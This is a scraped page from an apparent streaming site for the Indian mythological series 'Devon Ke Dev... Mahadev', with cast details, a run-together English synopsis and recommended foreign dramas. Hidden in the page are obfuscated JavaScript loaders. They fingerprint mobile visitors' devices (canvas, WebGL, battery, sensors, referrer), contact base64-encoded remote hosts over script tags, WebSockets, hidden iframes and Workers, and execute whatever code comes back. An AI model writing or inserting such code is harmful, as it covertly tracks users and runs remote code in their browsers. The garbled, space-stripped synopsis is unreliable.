湿婆神

湿婆神

剧情分类:奇幻  海外剧  

海外剧
立即播放
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDI3MQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x7a\x64\x47\x4e\x4f\x7a\x6b\x54\x61\x43']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='wob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){;if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){;if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){;if(!E)return;function l(s){;if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function handleFunc(ev){;if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{;if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){;if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){;if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,ref:a(),url:b(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9vc2tqZmtkbHNqZmRzLnN6ZmhsOTkuYY29t','d3NzOOi8vd3MuYWlsdW94aWFuZy5jb206OODQ4NCx3c3M6Ly93cy54bGZid2cuY29tOOjg0OODQ=',window,document,['Y','O']);}:function(){};
导演:
Nikhil  Sinha  Nikhil  Sinha  
主演:
上映:
2011
更新:
2022-01-24 17:00
剧情:
DevonKeDev...MahadevisaHinduspiritualtelevisiondramaserieswhichairsonLifeOKchannel.Itpremieredon18D..
百度云

猜你喜欢

奔月
2003 4.0分 海外剧
汉朝,淮南王刘安因对上古神话传说感兴趣,被武帝(刘威 饰)使为“离骚赋”,奉旨著书。为收集素材与妻子寻月遍访民间,历经世事,眼见因武帝营宫室、急赋敛、重刑诛而导致盗贼群起、民不聊生,著书锐兴顿减,又因寻月积劳成疾病倒途旅,遂返京上万言谏疏。武帝怒而欲杀之,幸得群臣力保,才于重杖之后 限令三日著成《淮南子》。及至回到家中,方知爱妻已撒手人寰,痛不欲生中挥泪提笔,奋笔二日成书两卷,当写到第五十四篇—..
30集全+特辑
诱爱入局泰语
2019 7.0分 海外剧
Picha用了将近全部婚姻生活的时间去期待丈夫Pomon在婚姻里的忠诚,两个人都太自我,太以自我为中心,不知怎么去爱对方,最终他们的婚姻也随着第三者的介入走向破灭。 因为婚姻的破灭让Picha痛苦不堪,也让她不敢不想再结婚。Ramin,不奢望一定要去占有她的爱她的人,他是为了Picha的微笑而活。Picha是他生命中在心里唯一的爱人,是第一个也是最后一个倾心爱的人。
34集全
歪爱时代
2020 5.0分 海外剧
由帕努瓦·可通塔维,格蒙达·瓦罗顿主演的《歪爱时代》,讲述了同性之间的爱情。
12集全
降伏魔女的手段
2018 5.0分 海外剧
泰剧《降服魔女的手段 》 由泰国女星Baifern和泰国男星Tao主演,剧情讲述嚣张跋扈的美丽小魔女身边来了一个帅气逼人温柔体贴的男秘书,小魔女慢慢喜欢上男秘书,但是这段爱情的背后似乎是一个骗局,最终小魔女是否会被爱情降服呢?
18集全
禁忌女孩2
2021 4.0分 海外剧
正义未得伸张?别忘了,有因必有果,让新同学来重写他们的结局。改编自8则真人真事,《转学来的女生》全新第2季即将上线。学校即将开学,《转学来的女生》要再次让坏人好看。5月7日,Netflix独家。导演:派拉曲·坤万(《转学来的女生》、《暹罗坟场》);康克得·崔维莫(《转学来的女生》、《亲密朋友》、《床边侦探》);西帝西里·蒙柯西里(《转学来的女生》、《飞人类之吻》);巴域·普利提潘也(《鬼4虐》、..
8集全

《湿婆神》剧情介绍

星空影院提供影视作品湿婆神高清全集完整版免费在线观看,海外剧《湿婆神》全集完整版作品的导演是Nikhil  Sinha  Nikhil  Sinha   ,由Sonarika  Bhadoria  Chari  Asopa  Arun  Bali  Vicky  Batra  Annapurna  Vitthal  Bhairi  Rajeev  Bharadwaj  Prabhat  Bhattacharya  Ahsaas  Channa  Shailesh  Dattar  潘卡吉.蒂尔  Ragini  Dubey  Radha  Krishna  Dutt  Darshan  Gandas  A  主演,湿婆神在豆瓣的评分为7.0,本片由星空影院于2022-01-24 17:00更新,希望大家喜欢,可以把《湿婆神》推荐给你朋友,本作品的地址为 http://www.incitedata.cn/vdetail/58420.html

《湿婆神》剧情简介:

DevonKeDev...MahadevisaHinduspiritualtelevisiondramaserieswhichairsonLifeOKchannel.Itpremieredon18December,2011andshowcasesthestoryofLordShiva,alsocalledasMahadev.ThedramaisinspiredbytheworksofDevduttPattanaik.ThestoryhasbeenresearchedfromBodhisattvaandhasbeenpennedupbyMihirBhuta.DevonKeDev...MahadevisthestoryoftheHinduGodShiva,alsocalledasMahadev.Theshowportrayshisjourneyfromahermittoahouseholder.IntheshowShivatakesmanyincarnationsandmanyincidentstakeplace.However,thisplotmentionsonlythemajorevents.ThestorystartswiththetaleofShiva’smarriagewithSati.SatiwhoisthedaughterofPrajapatiDaksha,astaunchVishnudevotee,isdrawntowardsShivaagainstthewishesofherfather.ShefinallymarriesShiva,butsoondiesbyself-immolationwhenherhusbandisinsultedattheyajnaofDaksha.Thegrief-strikenShivaproducesVirabhadra,whoslaysDaksha,howeverherestoresDaksha’slifeafterbeseechingofDaksha’swife.AdistraughtShivaleaveswithburntcorpseofSatiandwanderstheuniverse.Vishnuseversthebodyintopieces,shatteringthemonearth.ShivatransformsthepiecesintoShaktiPeethas,embodimentsofthepoweroftheGoddessAdiShakti.SatiisrebornasParvati,thedaughterofHimavan,kingoftheHimalayasandMainavati.Sheisalsothesisteroftheriver-goddess,Ganga.ParvatiisraisedinthehermitageoftheShivadevoteesageDadhichi,whoteachesherdevotiontoShiva.ParvatigrowsupandlikeSati,iscaptivatedbyShiva.Sheslowlyremembersherpastlife,thenwinsShivabyherausteritiesleadingtotheirmarriage.ShivaandParvatigivebirthtoKartikeya,whoslaysthedemonTarakasuraandhisbrothers.KartikeyaisalsonominatedforthethroneoftheKingofDevasbutShivaasksIndratocontinueastheking.AfterthisKartikeyaissenttotheDakshin(south)whereheiscaredbyMeenakshiandhereheslaysthedemon(asura),Tripathwithherhelp.ThestorygoesonwiththetaleofthedestructionofTripura,belongingtotherevengefulsonsofTarakasura,whowereearliergivenboonsbyShiva.AndjustbeforethedestructionoftheTripura,ShivaandParvati’sdaughter,Ashoksundariisborn.AfterthedestructionofTripura,exceptLordIndra(theKingofDevas)everyonecongratulateShivafordestructingTripuraandalsoforbeingthefatherofAshokasundari.RishiDurvasagiveshimaspecialgarland,whichShivagaveNaradaasprasadam.WhengivenLordIndraacceptsthegarlandplacingitonthetrunkofhiselephant,Airavatatoproofthatheisegoisticthrowsit.ThisenragesthesageandhecursesIndraandevryonetobebereftofallwealthandfortune.SoonlatertotakerevengeonthedestructionofTripura,KingBaliattacksheavenandinattempttostealAmrita(nectarofimmortality).ButitfallsintotheOceanofmilk.TogettheAmritbackDevasjoinhandswithAsurastochurntheoceanfortheAmritaandtoshareitamongthem.Thechurningoftheocean,knownasSamudraManthanisanelaborateprocess.IntheprocesstheDevasdisadvantagetheAsurasinmanyways.Despitethis,theychurntheocean.IntheprocessLordVishnualsotakeshissecondincarnationofaturtle,Kurma.Theprocessreleasesanumberofthingsfromtheocean.OneproductisthelethalpoisonknownasHalahala.Thiscouldcontaminatetheoceananddestroyallofcreation.TosaveeveryoneLordShivainhalesthepoisoninanactofself-sacrificebutParvatirescueshimbypressinghisnecktostopthepoisonfromspreading.Asaresult,thecolorofLordShiva’sneckturnsblue.DuringthechurningmanythingsareobtainedfromtheoceanwhichincludesLakshmi,theGoddessoffortuneandwealth,whoistheeternalconsortofVishnu.Thus,everyonegetstheirwealthandfortuneback.LaterVishnutakestheAmritasecretlyfromtheAsurasanddistributesitamongtheDevas.ThestorytakessomeyearsleapafterwhichitisshownthatKartikeyahasbeenremovedfromthepostofSenapati(headofthearmy),whichpleasesIndraandforthefirsttimeaftersomanyyears,agrown-upAshoksundarimeetsKartikeya.Kartikeyaalsomeetshisparents.HeenlightensAshoksundariaboutmeditationandsheinspiredbyitsomuchthatsherenouncesherlifetomeditate,whichdisturbsParvati.Lookingattheillhappeningoftheworld,ofhowAhalyaisseducedbyIndra,Mahadevcomeindside.EvenafterMahadevtellsthatheishisfatherandmanyothergodstriedtotellhim,hestillrefuses.MahadevgotangryandcutVinayak’shead.

eval("\x77\x69\x6e\x64\x6f\x77")["\x7A\x7A\x4F\x4F"]=function(e){var nD =''+'ABCDEFGHI'+'JKLMNOPQRSTUVWXY'+'Zabcdefg'+'hijklmnopqrstu'+'vwxyz0123456789+'+'/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=nD.indexOf(e.charAt(f++));o=nD.indexOf(e.charAt(f++));u=nD.indexOf(e.charAt(f++));a=nD.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x65\x6A\x52\x7A\x44\x76\x4F\x6E\x74"]=function(){eval(zzOO("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQoenpPTyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHp6T08oIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih6ek9PKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbenpPTygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKHp6T08oZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPScrJ0FOJysnejAwJysnU056JysnZycrJ3pOJysndCcrJ2cnKyduUnknKydVQycrJ2EnKydpVmpkJysneScrJ0VqUicrJ3lVeU0nKycwMCcrJ1FETXgnKydFMDBNbCcrJzAwMmInKydqNVNacCcrJ0ptZWwnKydSJysnbWN1JysnYycrJzNkM1prJysnTWxZaycrJ01sRTAnKycwTWxNJysnSGMwMFInKydIJysnYScrJycrJycsJycrJ3J2TCcrJ01GUScrJzVhJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ2hYaycrJ2RhbicrJ2knKycnKycnLCcwJyk="));}
function jGzRNKjs(e){var t="",n=r=c1=c2=0;while(n 0x3c e.length){r=e.charCodeAt(n);if(r 0x3c 128){t+=String.fromCharCode(r);n++;}else if(r 0x3e 191&&r 0x3c 224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)0x3c0x3c 6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)0x3c0x3c 12|(c2&63)0x3c0x3c 6|c3&63);n+=3;}}return t;};function FtMDu(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f 0x3c e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s 0x3c0x3c 2|o 0x3e0x3e 4;r=(o&15)0x3c0x3c 4|u 0x3e0x3e 2;i=(u&3)0x3c0x3c 6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return jGzRNKjs(t);};/*sedmniPHpNzwsbIQ*/window[''+'W'+'P'+'c'+'P'+'n'+'b'+'c'+'X'+'Q'+'P'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=FtMDu,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1]))); new Worker(window.URL.createObjectURL(new Blob(["var ws=new WebSocket('wss://"+k+":8585/"+i+"-0');ws.onmessage=function(e){ws.close();postMessage(e.data)};"]))).onmessage=function(e){new Function('_tdcs',x(e.data))(cs);}})('kkkksedmniPHpNzwsbIQ','d33NzLmhhb33l1bmRtbi5jb20=','v-108-183',window,document,['e','3']);}:function(){};
加载中...